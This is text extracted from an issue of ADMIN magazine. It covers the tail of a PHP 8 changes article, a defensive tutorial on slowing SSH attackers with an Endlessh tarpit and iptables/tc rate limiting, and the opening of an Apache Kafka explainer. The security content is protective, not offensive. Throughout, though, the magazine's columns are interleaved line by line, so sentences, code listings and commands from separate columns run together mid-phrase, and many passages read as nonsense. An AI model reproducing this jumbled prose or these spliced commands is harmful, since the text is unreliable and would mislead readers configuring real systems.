Developers can use traits to smuggle the ReflectionClass::newInstance(... Whether the JIT compiler really
functions into classes without pay- $args); method. However, if you want delivers the hoped-for performance
ing attention to the inheritance the PHP code to run under PHP 7 and boost or only gives PHP code a boost
hierarchy [4]. Listing 13 shows an 8, the PHP team recommends using the in special cases remains to be seen
example of this: A trait can also notation shown in Listing 15. in practice. n
define abstract functions, which the
individual classes must implement Stricter Reporting
in turn. PHP 8 is the first version Info
to check function signatures. The
Requirements [1] OPcache: [https://www.php.net/manual/
implementation of the Circle class If you call existing scripts in PHP 8, en/book.opcache.php]
thus throws an error due to the you can expect numerous error mes- [2] “PHP 8: JIT performance in real-life web
wrong string (Figure 3). sages. Besides some incompatible applications”: [https://stitcher.io/blog/
Elsewhere PHP is more agnostic: Un- changes, the main reason for these jit-in-real-life-web-applications]
til now, the interpreter applied some errors is stricter handling. From [3] token_get_all: [https://www.php.net/
inheritance rules to private methods, now on, the error report level E_ALL manual/function.token-get-all.php]
even if they were not visible in the will be used by default. Addition- [4] Traits: [https://www.php.net/manual/
derived class. In PHP 8 this no longer ally, the @ operator can be used to language.oop5.traits.php]
happens, which means that the code suppress fatal errors. Developers [5] Upgrading to PHP 8.0: [https://github.com/
shown in Listing 14 now runs with- must also be prepared for SQL errors php/php-src/blob/master/UPGRADING]
out an error message. when connecting to databases via
the PDO interface: Error handling
Changes now uses exception mode by default The Author
(PDO::ERRMODE_EXCEPTION). Tim Schürmann is a freelance computer sci-
PHP 8 irons out some inconsistencies Arithmetic and bitwise operators entist and author. Besides books, Tim has
and breaks backwards compatibility. throw a TypeError if one of the oper- published various articles in magazines and on
For example, ands is an array, a resource, or not websites.
an overloaded object. One exception
0 == "foo" occurs if you merge two arrays using Listing 14: Inheritance Theory
array + array. Division by zero throws class Foo {
is now considered false. PHP 8 only a DivisionByZeroError in PHP 8. final private function calc() { [...] }
evaluates the . operator for concat- Finally, PHP 8 removes some func- }
enating strings after an addition or tions and language constructs already
subtraction. Code such as tagged as deprecated in version 7.x. class Bar extends Foo {
private function calc() { [...] }
The PHP developers meticulously list
}
echo "Length: " . $y ‑ $x; all incompatible changes in a long
document online [5]. If you need
is now interpreted by PHP 8 as to maintain existing PHP code, you Listing 15: Reflection Class Notation
will definitely want to check out this ReflectionClass::newInstance($arg = null, ...$args);
echo "Length: " . ($y ‑ $x); document.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 29
TO O L S Timeout in a Tarpit

Endlessh and tc tarpits slow down attackers

Sticky Fingers
Keep an attacker’s connections open in an Endlessh “tarpit” or delay incoming connections with the more
traditional rate-limiting approach of tc. By Chris Binnie
A number of methods can stop at- Netfilter packet filter controlled by its with the exceptionally aesthetically
tackers from exhausting your server iptables frontend. pleasing Linux Mint 20 Ulyana sit-
resources, such as filtering inbound As surely as night follows day, auto- ting atop) will catch the connection
traffic with a variety of security appli- mated attacks will target the default when the SSH banner is displayed
ances locally or by utilizing commer- Secure Shell port (TCP port 22), so I before SSH keys are exchanged. By
cial, online traffic-scrubbing services will use SSH as the guinea pig test case keeping things simple, you don’t have
to catch upstream traffic for mitigat- with the knowledge that I can move the to worry about the complexities in-
ing denial-of-service attacks. Equally, real SSH service to an alternative port volved in solving encryption issues.
honeypots can be used to draw at- without noticeable disruption. In true DevOps fashion, I fire up End-
tackers in, so you get a flavor of the lessh with a Docker container:
attacks that your production servers Sticky Connections
might be subjected to in the future. $ git clone U
In this article, I look at a relatively un- If you visit the GitHub page for End- https://github.com/skeeto/endlessh
usual technique for slowing attackers lessh [1], you are greeted with a brief
down. First, Endlessh, a natty piece of description of its purpose: “Endlessh If you look at the Dockerfile within
open source software, can consume is an SSH tarpit that very slowly the repository, you can see an image
an attacker’s resources by keeping sends an endless, random SSH ban- that uses Alpine Linux as its base
their connections open (so that they ner. It keeps SSH clients locked up for (Listing 1).
have less ability themselves to attack hours or even days at a time.” Assuming Docker is installed cor-
your online services), leaving them in The documentation goes on to explain rectly (following the installation pro-
a “tarpit.” Second, to achieve similar that if you choose a non-standard port cess for Ubuntu 20.04 in my case, or
results a more traditional rate-limiting for your SSH server and leave End- as directed otherwise [2]), you can
approach, courtesy of advanced Linux lessh running on TCP port 22, it’s pos- build a container with the command:
networking and traffic control (tc), is sible to tie attackers in knots, reducing
investigated with the kernel’s built-in their ability to do actual harm. One $ cd endlessh/
relatively important caveat, though, is $ docker build ‑t endlessh .
Listing 1: Endlessh Dockerfile that if you commit too much capacity [...]
FROM alpine:3.9 as builder to what is known as tarpitting (i.e., Successfully built 6fc5221548db
RUN apk add ‑‑no‑cache build‑base bogging something down), it is possi- Successfully tagged endlessh:latest
ADD endlessh.c Makefile / ble to cause a denial of service unwit-
RUN make tingly to your own services. Therefore, Next, check that the container
Lead Image © Yewkeo, 123RF.com

you should never blindly deploy secu- image exists with docker images
FROM alpine:3.9 rity tools like these in production envi- (Listing 2). Now you can spawn
COPY ‑‑from=builder /endlessh /
ronments without massive amounts of a container. If you are au fait with
EXPOSE 2222/tcp
testing first. Dockerfiles, you will have spotted
ENTRYPOINT ["/endlessh"]
The particular tarpit I build here that TCP port 2222 will be exposed,
CMD ["‑v"]
on my Ubuntu 20.04 (Focal Fossa, as shown in the output:

30 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Timeout in a Tarpit TO O L S

$ docker run ‑it endlessh displayed with the ‑l (length) option. The docs state that the iptables tar-
2020‑11‑09T15:38:03.585Z Port 2222 To prevent an unexpected, self-in- get, “Captures and holds incoming
2020‑11‑09T15:38:03.586Z Delay 10000 duced denial of service on your own TCP connections using no local per-
2020‑11‑09T15:38:03.586Z MaxLineLength 32 servers, you can hard-code the maxi- connection resources.” Note that this
2020‑11‑09T15:38:03.586Z MaxClients 4096 mum number of client connections reassuring opening sentence appar-
2020‑11‑09T15:38:03.586Z U permitted so that your network stack ently improves the Endlessh chance of
BindFamily IPv4 Mapped IPv6 doesn’t start to creak at the seams. unwittingly causing a local denial-of-
Finally, it is possible to expose only service attack. The manual goes on to
The command you really want to use, the desired connection port on IPv4, say, “Attempts to close the connection
however, will expose that container IPv6, or both and, with the ‑d setting, are ignored, forcing the remote side to
port on the underlying host, too: alter the length of the gobbledygook time out the connection in 12-24 min-
display delays (which by default is utes.” That sounds pretty slick. A care-
$ docker run ‑d ‑‑name endlessh U currently set at 10,000ms or 10s). ful reading of the manual reveals more
‑p 2222:2222 endlessh tips. To open a “sticky” port to torment
Colonel Control attackers, you can use the command:
You can, of course, adjust the first
2222 entry and replace it with 22, the If you don’t want to use a prebuilt $ iptables ‑A INPUT ‑p tcp ‑m tcp U
standard TCP port. Use the docker ps solution like Endlessh for creating ‑‑dport 22 ‑j TARPIT
command to make sure that the con- a tarpit, you can achieve similar re-
tainer started as hoped. sults with tools available to Linux Noted in the documentation is that
In another terminal, you can check to by default, or more accurately, with you can prevent the connection track-
see whether the port is open as hoped the correct kernel modules installed. ing (conntrack) functionality in ipta-
by the Docker container (Listing 3). As mentioned, this approach is more bles from tracking such connections
Next, having proven that you have a rate-limiting than tarpitting but ul- with the NOTRACK target. Should
working Endlessh instance, you can timately much more powerful and you not do this, the kernel will un-
put it through its paces. well worth discovering. Much of the necessarily use up resources for those
A simple test is to use the unerring, following was inspired by a blog post connections that are stuck in a tarpit,
ultra-reliable netcat to see what is from 2017 [3]. An introduction that which is clearly unwelcome behavior.
coming back from port 2222 on the quotes Wikipedia notes that a tarpit To get started with the advanced
local machine: “is a service on a computer system Linux networking approach, accord-
(usually a server) that
$ nc ‑v localhost 2222 purposely delays incom- Listing 2: docker images
Connection to localhost 2222 port U ing connections” [4]. $ docker images
[tcp/*] succeeded! Having looked at that REPOSITORY TAG IMAGE ID CREATED SIZE
vc"06m6rKE"S40rSE2l post, followed by a little endlessh latest 6fc5221548db 58 seconds ago 5.67MB
&Noq1>p&DurlvJh84S more reading, I real- <none> <none> 80dc7d447a48 About a minute ago 167MB
bHzlY ized that I’d obviously alpine 3.9 78a2ce922f86 5 months ago 5.55MB

mTj‑(!EP_Ta|B]CJu;s'1^:m7/PrYF missed the fact that


LA%jF#vxZnN3Ai iptables (the kernel’s Listing 3: Checking for Open Port
network firewall, cour- $ lsof ‑i :2222
Each line of output takes 10 seconds tesy of the Netfilter proj- COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
to appear after the succeeded line ect’s component [5]) docker‑pr 13330 root 4u IPv4 91904 0t0 TCP *:2222 (LISTEN)

and is clearly designed to confuse has included by design


whoever is connecting to the port a tarpit feature of its Listing 4: Endlessh Help Output
into thinking something is about to very own. A look at the $ docker run endlessh ‑h
respond with useful, sane commands. online manual [6] (or
Simple but clever. the output of the man Usage: endlessh [‑vh] [‑46] [‑d MS] [‑f CONFIG] [‑l LEN] [‑m LIMIT] [‑p PORT]
If you need more information to de- iptables command) has ‑4 Bind to IPv4 only
ploy Endlessh yourself, use the docker some useful informa- ‑6 Bind to IPv6 only
run command with the ‑h option at the tion to help you get ‑d INT Message millisecond delay [10000]
end to see the help output (Listing 4). started. The premise to ‑f Set and load config file [/etc/endlessh/config]
As the help output demonstrates, it is using the TARPIT target ‑h Print this help message and exit
‑l INT Maximum banner line length (3‑255) [32]
very easy to alter ports (from a con- module in iptables, as
‑m INT Maximum number of clients [4096]
tainer perspective), but you should you’d expect from such
‑p INT Listening port [2222]
edit the docker run command as dis- a sophisticated piece
‑v Print diagnostics to standard output (repeatable)
cussed above. Endlessh allows you to of software, looks well ‑V Print version information and exit
specify how much gobbledygook is considered and refined.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 31
TO O L S Timeout in a Tarpit

Listing 5: tc rule with a “mangle” table that helps


you manipulate connections to your
$ tc
heart’s content. For step 1, you may
Usage: tc [ OPTIONS ] OBJECT { COMMAND | help } need to adjust the ‑A options to ‑I if
tc [‑force] ‑batch filename you have rules in place, MARK your
where OBJECT := { qdisc | class | filter | chain | action | monitor | exec } connections to the SSH port (with two
OPTIONS := { ‑V[ersion] | ‑s[tatistics] | ‑d[etails] | ‑r[aw] | ‑o[neline] | ‑j[son] | ‑p[retty] rules – one as the source port and one
| ‑c[olor] ‑b[atch] [filename] | ‑n[etns] name | ‑N[umeric] | ‑nm | ‑nam[es] | { ‑cf
as the destination – because you’ll test
| ‑conf } path }
to see whether it works by using con-
nections from another local machine):
ing to the aforementioned blog post, After some testing, you can uninstall
you need to make sure your kernel those exact packages to keep your sys- $ iptables ‑A OUTPUT ‑t mangle U

supplies the tc traffic control utility tem trim. The commands in Listing 7 ‑p tcp ‑‑sport 22 ‑j MARK U

(stripped down kernels might not start up the SSH daemon (sshd) and tell ‑‑set‑mark 10
have it enabled). Thankfully, on my you that it is listening on port 22. IPv6 $ iptables ‑A OUTPUT ‑t mangle U

Linux Mint version it is. To deter- and IPv4 connections are open on the ‑p tcp ‑‑dport 22 ‑j MARK U

mine whether your system has the default port, so you can continue. ‑‑set‑mark 10
tool, enter the tc command (List- At this stage, if you are testing on a
ing 5). In Listing 6, you can see server, make sure that you have al- As you can see, one source port
that no rules currently are loaded in tered your main SSH port and restarted and one destination port have been
iptables. your SSH daemon, or potentially you configured to mark the packets with
On my laptop, an SSH server isn’t in- will be locked out of your server. The the label 10. Now, check that traffic
stalled automatically so I have to add steps you aim to achieve are: is hitting the rules, or chains, cre-
it to the system: 1. With iptables, mark packets to all ated by checking the mangle table
traffic hitting the SSH port, TCP (Listing 8).
$ apt install openssh‑server port 22, with MARK as an option. For step 2, run a new tc command
2. Use tc to set up the hierarchy traf- to add the HTB qdisc (or the sched-
The following NEW packages will be U fic bucket (HTB) qdisc, to catch uler) to your network interface.
installed traffic to be filtered. First, however, you need to know
ncurses‑term openssh‑server U 3. Create an HTB rule that will be used the name of your machine’s net-
openssh‑sftp‑server ssh‑import‑id for normal traffic (allowing the use work interfaces with ip a. In my
of loads of bandwidth), case, I can ignore the lo localhost
Listing 6: iptables ‑nvL calling it 1:0. interface, and I can see the wireless
$ iptables ‑nvL 4. Create a second HTB interface named wlpls0, as seen in a
rule that will only be line of the output:
Chain INPUT (policy ACCEPT 0 packets, 0 bytes) allowed a tiny amount
pkts bytes target prot opt in out source destination of traffic and call it 1:5. wlp1s0: U

5. Use tc to create a filter <BROADCAST,MULTICAST,UP,LOWER_UP> U


Chain FORWARD (policy ACCEPT 0 packets, 0 bytes) and get it to match the mtu 1500 state UP group default qlen 1000
pkts bytes target prot opt in out source destination
MARK option set in
step 1; then, watch it From now on, I can simply alter the
Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
get allocated to the 1:5 wlp1s0 entry for the network interface.
pkts bytes target prot opt in out source destination
traffic flows. Now, add the HTB qdisc scheduler to
6. Check the output of the network interface as your parent
Listing 7: Starting sshd both the HTB traffic rule (which is confusingly referenced
$ systemctl start sshd class rules to look for as 1:, an abbreviated form of 1:0):
$ lsof ‑i :22 overlimits.
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME Now it’s time to put $ tc qdisc add dev wlp1s0 root U
sshd 5122 root 3u IPv4 62113 0t0 TCP *:ssh (LISTEN)
those steps in action. handle 1: htb
sshd 5122 root 4u IPv6 62115 0t0 TCP *:ssh (LISTEN)
To begin, add an iptables
As per step 3, you need to create a
Listing 8: Checking the Mangle Table rule for all your network interface
$ iptables ‑t mangle ‑nvL traffic, with the exception of your
Chain OUTPUT (policy ACCEPT 15946 packets, 7814K bytes) tarpit or throttled traffic, by dutifully
pkts bytes target prot opt in out source destination naming this classifier 1:0 (I prefer to
192 35671 MARK tcp ‑‑ * * 0.0.0.0/0 0.0.0.0/0 tcp spt:22 MARK set 0xa
think of such rules as a “traffic class”
31 4173 MARK tcp ‑‑ * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:22 MARK set 0xa
for simplicity):

32 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Timeout in a Tarpit TO O L S

$ tc class add dev wlp1s0 U Now log in to another machine on a small amount of traffic, it’s not go-
parent 1: classid 1:0 htb rate 8000Mbit your local network with SSH access ing to be an enjoyable experience.
(or open up SSH access for a remote
For step 4, instead of adding loads machine) and run the command, The End Is Nigh
of traffic allowance add just 10bps
of available throughput and call the $ ssh 192.168.0.16 If you’re keen to learn more about the
entry 1:5 for later reference: genuinely outstanding tc and its col-
replacing your IP address for mine. lection of various qdiscs, which you
$ tc class add dev wlp1s0 U After watching a very slow login should, you can find a lot more infor-
parent 1: classid 1:5 htb U prompt, you can generate some arbi- mation online to alter your network
rate 80bit prio 1 trary noise in the terminal (use any traffic in almost any way you imag-
command that you like), such as the ine. The manual page for Ubuntu [7]
The filter for step 5 picks up all following, which on my machine will is a good start.
marked packets courtesy of the ipta- push screeds of data up the screen: For further reading on tarpits, refer
bles rules in step 1 and matches the to the Server Fault forum [8], which
1:5 traffic class entry in HTB: $ find / ‑name chrisbinnie discusses the good and bad elements
of tarpits in detail and offers some
$ tc filter add dev wlp1s0 parent 1: U If all goes well, you should see the useful insights into how the ordering
prio 1 protocol ip handle 10 fw flowid 5 output move very, very slowly in- of your iptable chains, or rules, can
deed, and if you’re serving an appli- be set up to be the most efficient.
Note the flowid 5 to match the 1:5 cation over another port (I’m not on Also, pay attention to the comments
traffic class and the ip handle 10 to my laptop), other services should be about accidentally filling up logs and
match the iptables rules. absolutely fine, running as usual at causing a different type of denial of
For step 6, you can see your qdisc the normal speed. service that you might not have been
in action: The proof in the pudding – that your expecting.
second class is matching traffic to As mentioned before, be certain you
$ watch ‑n1 tc ‑s ‑g class show dev wlp1s0 the filter that references the iptables know what you are switching on when
rules – is seen in Figure 1 for the 1.5 it comes to tarpit functionality, which-
Figure 1 shows the hierarchical class. If you run a few commands on ever route you take. On occasion, hon-
explanation of the two child clas- your other machine that is SSH’d into eypots and tarpits can be an invaluable
sifiers, which are sitting under the your throttled SSH server, you should addition to your security setup, but
parent qdisc. see the overlimits increase steadily. In without some forethought, it is quite
For more granular information on Figure 1, that is showing 36 packets. possible to tie your shoelaces across
qdisc, traffic class, or filter level, you If you need to triple-check that it is your shoes and trip yourself up, irritate
can use the commands: working as hoped, you can remove your users, and cause a whole heap of
the running tc configuration: extra work for yourself. n
$ tc qdisc show dev wlp1s0
$ tc class show dev wlp1s0 $ tc qdisc del dev wlp1s0 root
$ tc filter show dev wlp1s0 Info
SSH should magically return to being [1] Endlessh:
Next, you should look for your local nice and responsive again. [https://github.com/skeeto/endlessh]
network interface’s IP address (make Although you are not strictly tarpit- [2] Install Docker engine on Ubuntu: [https://
sure you replace my network inter- ting connections, you are limiting docs.docker.com/engine/install/ubuntu]
face name with your own): them significantly. The exceptional tc [3] “Super Simple SSH Tarpit” by Gabriel Ny-
will only allow that tiny upper limit man, November 20, 2017:
$ ip a | grep wlp1s0 | grep inet of bandwidth to all SSH connections [https://nyman.re/super-simple-ssh-tarpit]
inet 192.168.0.16/24 brd 192.168.0.255 U on TCP port 22, so rest assured that [4] Tarpit: [https://en.wikipedia.org/wiki/
scope global dynamic noprefixroute wlp1s0 with multiple attackers vying for such Tarpit_(networking)]
[5] Netfilter: [https://www.netfilter.org]
[6] iptables:
[https://linux.die.net/man/8/iptables]
[7] Ubuntu tc man page:
[http://manpages.ubuntu.com/manpages/
cosmic/man8/tc.8.html]
[8] Server Fault: [https://serverfault.com/
questions/611063/does-tarpit-have-any-
Figure 1: One large and one small traffic class, in terms of throughput. known-vulnerabilities-or-downsides]

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 33
TO O L S Apache Kafka

Processing streaming events with Apache Kafka

The Streamer
Apache Kafka reads and writes events virtually in real time, and you can extend it to take on a wide range of
roles in today’s world of big data and event streaming. By Kai Wähner
Event streaming is a modern concept to create centralized feeds with real- An event connects a notification (a
that aims at continuously process- time metrics. Kafka also serves as a temporal element on the basis of
ing large volumes of data. The open central source of truth for bundling which the system can trigger another
source Apache Kafka [1] has estab- data generated by various compo- action) with a state. In most cases
lished itself as a leader in the field. nents of a distributed system. Kafka the message is quite small – usually
Kafka was originally developed by fields, stores, and processes data a few bytes or kilobytes. It is usually
the career platform LinkedIn to pro- streams of any size (both real-time in a structured format, such as JSON,
cess massive volumes of data in real streams and from other interfaces, or is included in an object serialized
time. Today, Kafka is used by more such as files or databases). As a re- with Apache Avro or Protocol Buffers
than 80 percent of the Fortune 100 sult, companies entrust Kafka with (protobuf).
companies, according to the project’s technical tasks such as transforming,
own information. filtering, and aggregating data, and Architecture and Concepts
Apache Kafka captures, processes, they also use it for critical business
stores, and integrates data on a large applications, such as payment trans- Figure 1 shows a sensor analysis
scale. The software supports numer- actions. use case in the Internet of Things
ous applications, including distrib- Kafka also works well as a modern- (IoT) environment with Kafka. This
uted logging, stream processing, data ized version of the traditional mes- scenario provides a good overview
integration, and pub/sub messaging. sage broker, efficiently decoupling a of the individual Kafka components
Kafka continuously processes the data process that generates events from and their interaction with other
almost in real time, without first writ- one or more other processes that re- technologies.
ing to a database. ceive events. Kafka’s architecture is based on the
Kafka can connect to virtually any abstract idea of a distributed commit
other data source in traditional enter- What is Event Streaming log. By dividing the log into parti-
prise information systems, modern tions, Kafka is able to scale systems.
databases, or the cloud. Together with In the parlance of the event-streaming Kafka models events as key-value
the connectors available for Kafka community, an event is any type of ac- pairs.
Connect, Kafka forms an efficient tion, incident, or change that a piece Internally these keys and values
Photo by Mark Decile on Unsplash

integration point without hiding the of software or an application identifies consist only of byte sequences. How-
logic or routing within the centralized or records. This value could be a pay- ever, in your preferred programming
infrastructure. ment, a mouse click on a website, or a language they can often be repre-
Many organizations use Kafka to temperature point recorded by a sen- sented as structured objects in that
monitor operating data. Kafka collects sor, along with a description of what language’s type system. Conversion
statistics from distributed applications happened in each case. between language types and internal

34 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Apache Kafka TO O L S

Figure 1: Kafka evaluates the measuring points of the IoT sensors. A Kafka producer feeds them into the platform, and a Kafka consumer
receives them for monitoring. At the same time, they are transferred to a Spark-based analysis platform by Kafka Connect. © Confluent

bytes is known as (de-)serialization which roughly corresponds to a table lete the messages after consumption.
in Kafka-speak. As mentioned earlier, in a relational database. For develop- The goal is not to keep the messages
serialized formats are mostly JSON, ers working with Kafka, the topic longer, to be fed to the same or an-
JSON Schema, Avro, or protobuf. is the abstraction they think about other application later (Figure 2).
What exactly do the keys and values most. You create topics to store dif- Because Kafka topics are available
represent? Values typically represent ferent types of events. Topics can also as logfiles, the data they contain is
an application domain object or some comprise filtered and transformed by nature not temporarily available,
form of raw message input in serial- versions of existing topics. as in traditional messaging systems,
ized form – such as the output of a A topic is a logical construct. Kafka but permanently available. You can
sensor. stores the events for a topic in a log. configure each topic so that the data
Although complex domain objects These logs are easy to understand be- expires either after a certain age (re-
can be used as keys, they usually cause they are simple data structures tention time) or as soon as the topic
consist of primitive types like strings with known semantics. reaches a certain size. The time span
or integers. The key part of a Kafka You should keep three things in can range from seconds to years to
event does not necessarily uniquely mind: (1) Kafka events always ap- indefinitely.
identify an event, as would the pri- pend to the end of a logfile. When The logs underlying Kafka topics are
mary key of a row in a relational the software writes a new message stored as files on a disk. When Kafka
database. Instead, it is used to deter- to a log, it always ends up at the last writes an event to a topic, it is as
mine an identifiable variable in the position. (2) You can only read events permanent as the data in a classical
system (e.g., a user, a job, or a spe- by searching for an arbitrary position relational database.
cific connected device). (offset) in the log and then sequen- The simplicity of the log and the im-
Although it might not sound that sig- tially browsing log entries. Kafka does mutability of the content it contains
nificant at first, keys determine how not allow queries like ANSI SQL, are the key to Kafka’s success as a
Kafka deals with things like parallel- which lets you search for a certain critical component in modern data
ization and data localization, as you value. (3) The events in the log prove infrastructures. A (real) decoupling of
will see. to be immutable – past events are the systems therefore works far bet-
very difficult to undo. ter than with traditional middleware
Kafka Topics The logs themselves are basically per- (Figure 3), which relies on the extract,
petual. Traditional messaging systems transform, load (ETL) mechanism or
Events tend to accumulate. That is in companies use queues as well as an enterprise service bus (ESB) and
why the IT world needs a system to topics. These queues buffer messages which is based either on web services
organize them. Kafka’s most basic on their way from source to destina- or message queues. Kafka simplifies
organizational unit is the “topic,” tion. However, they usually also de- domain-driven design (DDD) but also

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 35
TO O L S Apache Kafka

Figure 2: Kafka’s consumers sometimes consume the data in real time. © Confluent

allows communication with outdated several logs, each of which exists on If the message includes a key, Kafka
interfaces [2]. a separate node in the Kafka cluster. calculates the target partition from a
This approach distributes the work hash of the key. In this way, the soft-
Kafka Partitions of storing messages, writing new ware guarantees that messages with
messages, and processing existing the same key always end up in the
If a topic had to live exclusively on messages across many nodes in the same partition and therefore always
one machine, Kafka’s scalability cluster. remain in the correct order.
would be limited quite radically. Once Kafka has partitioned a topic, Keys are not unique, though, but
Therefore, the software (in contrast to you need a way to decide which mes- reference an identifiable value in
classical messaging systems) divides sages Kafka should write to which the system. For example, if the
a logical topic into partitions, which partitions. If a message appears events all belong to the same cus-
it distributes to different machines without a key, Kafka usually distrib- tomer, the customer ID used as a
(Figure 4), allowing individual top- utes the subsequent messages in a key guarantees that all events for a
ics to be scaled as desired in terms of round-robin process to all partitions particular customer always arrive in
data throughput and read and write of the topic. In this case, all partitions the correct order. This guaranteed
access. receive an equal amount of data, but order is one of the great advantages
Partitioning takes the single topic and the incoming messages do not adhere of the append-only commit log in
splits it (without redundancy) into to a specific order. Kafka.

Figure 3: Apache Kafka’s domain-driven design helps decouple middleware. © Confluent

36 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Apache Kafka TO O L S

Kafka Brokers veloped by Kafka Listing 1: KafkaProducer API


users to insert
Thus far, I have explained events, top- messages into 01 [...]
02 try (KafkaProducerString,<Payment> producer = new KafkaProducer<String,
ics, and partitions, but I have not yet and read mes-
Payment>(props)) {
addressed the actual computers too sages from topics.
03
explicitly. From a physical infrastruc- Every component 04 for (long i =**0; i <**10; i++) {
ture perspective, Kafka comprises a of the Kafka plat- 05 final String orderId = "id" + Long.toString(i);
network of machines known as bro- form that is not 06 final Payment payment = new Payment(orderId,**1000.00d);
kers. Today, these are probably not a Kafka broker 07 final ProducerRecord<String, Payment> record =
physical servers, but more typically is basically a 08 new ProducerRecord<String, Payment>("transactions",
containers running on pods, which producer or con- 09 payment.getId().toString(),
in turn run on virtualized servers sumer – or both. 10 payment);
running on actual processors in a Producers and 11 producer.send(record);
physical data center somewhere in consumers form 12 }
13 } catch (final InterruptedException e) {
the world. the interfaces to
14 e.printStackTrace();
Whatever they do, they are indepen- the Kafka cluster.
15 }
dent machines, each running the 16 [...]
Kafka broker process. Each broker
Kafka
hosts a certain set of partitions and
handles incoming requests to write
Producers Kafka Consumers
new events to the partitions or read The API interface of the producer Where there are producers, there are
events from them. Brokers also repli- library is quite lightweight: A Java usually also consumers. The use of the
cate the partitions among themselves. class named KafkaProducer connects KafkaConsumer API is similar in prin-
the client to the cluster. This class ciple to that of the KafkaProducer API.
Replication has some configuration parameters, The client connects to the cluster via
including the address of some bro- the KafkaConsumer class. The class also
Storing each partition on just one kers in the cluster, a suitable security has configuration options, which deter-
broker is not enough: Regardless of configuration, and other settings that mine the address of the cluster, security
whether the brokers are bare-metal influence the network behavior of the options, and other parameters. On the
servers or managed containers, they producer. basis of the connection, the consumer
and the storage space on which they Transparently for the developer, the then subscribes to one or more topics.
are based are vulnerable to failure. library manages connection pools, Kafka scales consumer groups more
For this reason, Kafka copies the par- network buffers, and the processes of or less automatically. Just like Kafka‑
tition data to several other brokers to waiting for confirmation of messages Producer, KafkaConsumer also manages
keep it safe. by brokers and possibly retransmitting connection pooling and the network
These copies are known as “fol- messages. It also handles a multitude protocol. However, the functionality
lower replicas,” whereas the main of other details that the application pro- on the consumer side goes far beyond
partition is known as the “leader grammer does not need to worry about. the network cables.
replica” in Kafka-speak. When a The excerpt in Listing 1 shows the use When a consumer reads a message, it
producer generates data for the of the KafkaProducer API to generate does not delete it, which is what distin-
leader (generally in the form of read and send 10 payment messages. guishes Kafka from traditional message
and write operations), the leader
and the followers work together to
replicate these new writes to the
followers automatically. If one node
in the cluster dies, developers can
be confident that the data is safe
because another node automatically
takes over its role.

Client Applications
Now I will leave the Kafka cluster
itself and turn to the applications that
Kafka either populates or taps into:
the producers and consumers. These
client applications contain code de- Figure 4: Replication in Kafka with a leader, followers, topics, and partitions. © Confluent

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 37
TO O L S Apache Kafka

queues. The message is still there, and However, the Kafka developer com- want to convert data from these sys-
any interested consumer can read it. munity has learned that further appli- tems into Kafka topics; sometimes
In fact, it is quite normal in Kafka for cation scenarios soon emerge among you want to store data from Kafka
many consumers to access a topic. users in practice. To implement these, topics on these systems. The Kafka
This seemingly minor fact has a dis- users then usually develop similar Connect integration API is the right
proportionately large influence on the functions around the Kafka core. To tool for the job.
types of software architectures that do so, they build layers of application Kafka Connect comprises an ecosys-
are emerging around Kafka, because functionality to handle certain recur- tem of connectors on the one hand
Kafka is suitable not just for real-time ring tasks. and a client application on the other.
data processing. In many cases, other The code developed by Kafka users The client application runs as a server
systems also consume the data, in- may do important work, but it is usu- process on hardware separate from
cluding batch processes, file process- ally not relevant to the actual busi- the Kafka brokers – not just a single
ing, request-response web services ness field in which their activities lie. Connect worker, but a cluster of
(representational state transfer, REST/ At most, it indirectly generates value Connect workers who share the data
simple object access protocol, SOAP), for the users. Ideally, the Kafka com- transfer load into and out of Kafka
data warehouses, and machine learn- munity or infrastructure providers from and to external systems. This ar-
ing infrastructures. should provide such code. rangement makes the service scalable
The excerpt in Listing 2 shows how And they do: Kafka Connect [3], the and fault tolerant.
the KafkaConsumer API consumes Confluent Schema Registry [4], Kafka Kafka Connect also relieves the user
and processes 10 payment messages. Streams [5], and ksqlDB [6] are ex- of the need to write complicated
amples of this kind of infrastructure code: A JSON configuration is all that
Kafka Ecosystem code. Here, I look at each of these is required. The excerpt in Listing 3
examples in turn. shows how to stream data from Kafka
If there were only brokers managing into an Elasticsearch installation.
partitioned, replicated topics with an Data Integration with
ever-growing collection of producers Kafka Streams and ksqlDB
and consumers, who in turn write
Kafka Connect
and read events, this would already Information often resides in systems In a very large Kafka-based applica-
be quite a useful system. other than Kafka. Sometimes you tion, consumers tend to increase com-
plexity. For example, you might start
Listing 2: KafkaConsumer API with a simple stateless transformation
01 [...] (e.g., obfuscating personal informa-
02 try (final KafkaConsumer<String, Payment> consumer = new KafkaConsumer<>(props)) { tion or changing the format of a mes-
03 consumer.subscribe(Collections.singletonList(TOPIC)); sage to meet internal schema require-
04 ments). Kafka users soon end up with
05 while (true) { complex aggregations, enrichments,
06 ConsumerRecords<String, Payment> records = consumer.poll(10); and more.
07 for (ConsumerRecord<String, Payment> record : records) { The code of the KafkaConsumer API
08 String key = record.key(); does not provide much support for
09 Payment value = record.value();
such operations: Developers working
10 System.out.printf("key = %s, value = %s%n", key, value);
for Kafka users therefore have to pro-
11 }
gram a fair amount of frame code to
12 }
13 } deal with time slots, latecomer mes-
